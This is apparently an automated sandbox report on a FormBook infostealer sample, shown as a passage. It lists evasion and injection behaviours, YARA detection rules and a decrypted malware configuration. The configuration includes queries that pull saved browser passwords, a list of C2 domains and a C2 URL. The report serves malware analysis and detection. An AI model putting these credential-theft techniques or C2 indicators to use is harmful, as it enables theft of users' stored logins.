Play interactive tour

Edit tour

Analysis Report SKM_C36821010708320.exe

Overview

General Information

Sample Name:	SKM_C36821010708320.exe
Analysis ID:	339379
MD5:	15d8096422d137c7388908bb2be61ec4
SHA1:	e67d261ef38eb251fb97a466d83c95e75d286ebe
SHA256:	fae57c2f185899220dff608004ab571822fc14cc02aa7e30b1cd5db7be4beea8
Tags:	DHLexeFormbook
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM_3

Yara detected FormBook

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

SKM_C36821010708320.exe (PID: 4740 cmdline: 'C:\Users\user\Desktop\SKM_C36821010708320.exe' MD5: 15D8096422D137C7388908BB2BE61EC4)

SKM_C36821010708320.exe (PID: 1928 cmdline: C:\Users\user\Desktop\SKM_C36821010708320.exe MD5: 15D8096422D137C7388908BB2BE61EC4)

explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

msdt.exe (PID: 1736 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)

cmd.exe (PID: 4952 cmdline: /c del 'C:\Users\user\Desktop\SKM_C36821010708320.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x99bc", "KEY1_OFFSET 0x1e51d", "CONFIG SIZE : 0xc7", "CONFIG OFFSET 0x1e61b", "URL SIZE : 25", "searching string pattern", "strings_offset 0x1d163", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x1a749ebd", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715050", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121e8", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01475", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "shuttergame.com", "beyondregions.com", "cuttingedgetinting.com", "riveraspanishfoods.com", "jfksn.com", "rtplay2020.com", "idahofallsobituaries.com", "qf432.com", "magandaconfections.com", "suremlak.com", "tuproductividadpersonal.com", "ziswmyxaw.icu", "howtolovemybody.com", "signpartnerpro.com", "conservative-forward.com", "bhscsh.com", "todowine.com", "garrettthermaldetector.com", "bunbook.com", "ehealthla.com", "mojacreations.com", "2kantxt.com", "aqustea.com", "sheilataman.com", "phymath.science", "sctuba.com", "columbusestatesseniorliving.com", "opyalliy.pro", "bestgiftforu.com", "cad-office-iserlohn.com", "gorgeus-girl-full-service.today", "easthaus-modern.com", "snoozefest.online", "service-xwcrvxsz.icu", "flavourcosmetics.com", "news247alert.com", "944ka.xyz", "bcheap3dmall.com", "crepkonnect.com", "purelili.com", "pushupbras.net", "ctsafaris.com", "sprinkleforever.com", "engagingsci.coach", "aihint.com", "icxrus.com", "7vitrines.com", "mrsgariepy.com", "bikewitha.pro", "adv-assist.com", "youlacka.com", "languagekickstart.com", "commonscentsbychloe.com", "o-tanemaki.com", "wlgdrs.com", "imbentaryo.com", "winwithrundlemall.com", "jumben.xyz", "24k88lotto.com", "bundlesofjoihair.com", "bukannyaterbuai31.com", "essentialeatscatering.com", "brasseriedufayard.com", "trumpvotr.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.ameeraglow.com/6bu2/\u0000"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x12de88:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x12e0f2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15a6a8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15a912:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x139c15:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x166435:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x139701:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x165f21:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139d17:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x166537:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x139e8f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1666af:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x12eb0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x15b32a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x13897c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x16519c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x12f803:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x15c023:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x13fa87:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x16c2a7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x140a8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x13c9a9:$sqlite3step: 68 34 1C 7B E1 0x13cabc:$sqlite3step: 68 34 1C 7B E1 0x1691c9:$sqlite3step: 68 34 1C 7B E1 0x1692dc:$sqlite3step: 68 34 1C 7B E1 0x13c9d8:$sqlite3text: 68 38 2A 90 C5 0x13cafd:$sqlite3text: 68 38 2A 90 C5 0x1691f8:$sqlite3text: 68 38 2A 90 C5 0x16931d:$sqlite3text: 68 38 2A 90 C5 0x13c9eb:$sqlite3blob: 68 53 D8 7F 8C 0x13cb13:$sqlite3blob: 68 53 D8 7F 8C 0x16920b:$sqlite3blob: 68 53 D8 7F 8C 0x169333:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: SKM_C36821010708320.exe PID: 4740	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.SKM_C36821010708320.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.SKM_C36821010708320.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.SKM_C36821010708320.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
2.2.SKM_C36821010708320.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.SKM_C36821010708320.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a6e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b6ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.SKM_C36821010708320.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17609:$sqlite3step: 68 34 1C 7B E1 0x1771c:$sqlite3step: 68 34 1C 7B E1 0x17638:$sqlite3text: 68 38 2A 90 C5 0x1775d:$sqlite3text: 68 38 2A 90 C5 0x1764b:$sqlite3blob: 68 53 D8 7F 8C 0x17773:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack

Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x99bc", "KEY1_OFFSET 0x1e51d", "CONFIG SIZE : 0xc7", "CONFIG OFFSET 0x1e61b", "URL SIZE : 25", "searching string pattern", "strings_offset 0x1d163", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x1a749ebd", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715050", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121e8", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01475", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", 